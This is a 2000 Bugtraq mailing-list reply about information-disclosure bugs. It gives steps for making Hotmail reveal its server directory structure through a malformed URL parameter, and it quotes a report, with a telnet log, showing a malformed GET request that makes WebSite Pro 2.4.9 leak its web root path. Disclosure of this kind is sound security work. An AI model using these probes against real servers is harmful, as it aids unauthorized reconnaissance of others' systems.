[13392] in bugtraq
Re: HOTMAIL is revealing Webdirectories
daemon@ATHENA.MIT.EDU (Gushterul)
Mon Jan 17 19:49:21 2000
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id: <Pine.LNX.4.10.10001150830460.20336-100000@tdhp.transdata.ro>
Date: Sat, 15 Jan 2000 08:37:11 -0500
Reply-To: Gushterul <emild@TDHP.TRANSDATA.RO>
From: Gushterul <emild@TDHP.TRANSDATA.RO>
X-To: Lark Lizerman <webmaster@DOC2000.DE>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <00f001bf5e58$112c1d60$beffcd98@u1u7p1>
How? Get into your Hotmail account. After you are logged in, modify in the
string address the part with "disk=216.33.148.68_" in something like
"disk="abc.beh.doh.cih_". I mean to put string text in the place of the IP
address. It will give you a nice error revealing directory structure of
server and you will be able to understand after this a big part of address
string.
Gushterul
On Thu, 13 Jan 2000, Lark Lizerman wrote:
> I got a tip from Noah Rathaus about WebSite Pro latest version(2.4.9). He mentioned a server
> where WebSite Pro. 2.4.9 is run.
> I discovered, that also the latest version is vulnerable to the bug of revealing webdirectories.
> In the new version there must be made a change to retrieve the directoryname.
>
> When you connect to a server send the command line:
>
> GET /HTTP1.0 \
>
> You have now to add a space before the last backspace of the commandline.
> That makes the server respond with a "404" error and and prints the directoryname.
>
>
> Here is the part from the logfile of Windows Telnet Client:
>
> website.oreilly.com:
> ----------------------------------------------------start-------------------------------------------------------
>
> GET /HTTP1.0 \
>
> HTTP/1.0 404 Not Found
> Date: Thu, 13 Jan 2000 20:47:12 GMT
> Server: WebSitePro/2.4.9
> Accept-ranges: bytes
> Content-type: text/html
> Content-length: 216
>
> <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
> <BODY bgcolor="White"><H2>404 Not
> Found</H2>
> The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>(c
> :\1Web\docs\website\HTTP1.0)</CODE><P>
> </BODY></HTML>
> --------------------------------------------------end--------------------------------------------------------
>
> Here it shows us the directory "c:\1Web\docs\website\".
>
>
> Status: Vendor contacted and informed about the bug.
> Expecting statement about fix.
>
> -------------------------------
> Lark Lizerman
> Contact:
> Lark82@hotmail.com
> or
> webmaster@doc2000.de
> -------------------------------
>
